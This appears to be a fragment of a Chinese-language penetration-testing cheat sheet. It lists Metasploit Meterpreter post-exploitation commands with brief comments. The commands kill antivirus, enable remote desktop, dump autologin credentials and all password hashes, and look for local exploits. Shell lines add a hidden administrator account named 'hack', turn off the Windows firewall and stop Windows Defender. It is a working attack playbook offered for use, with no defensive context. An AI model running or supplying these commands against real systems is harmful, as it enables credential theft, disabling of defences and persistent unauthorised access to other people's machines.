1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
| run post/windows/manage/migrate #自动进程迁移 run post/windows/gather/checkvm #查看目标主机是否运行在虚拟机上 run post/windows/manage/killav #关闭杀毒软件 run post/windows/manage/enable_rdp #开启远程桌面服务 run post/windows/manage/autoroute #查看路由信息 run post/windows/gather/enum_logged_on_users #列举当前登录的用户 run post/windows/gather/enum_applications #列举应用程序 run post/windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码 run post/windows/gather/smart_hashdump #dump出所有用户的hash run getgui -u hack -p 123 run post/windows/gather/enum_patches 补丁信息 run post/multi/recon/local_exploit_suggester 查询可利用的漏洞 有时候无法使用后渗透模块添加用户 可以使用shell自主添加 net user hack Zyx960706 /add net localgroup administrator hack /add netsh advfirewall set allprofiles state off #关闭防火墙 net stop windefend run post/windows/gather/enum_patches 补丁信息 run post/multi/recon/local_exploit_suggester 查询可利用的漏洞
|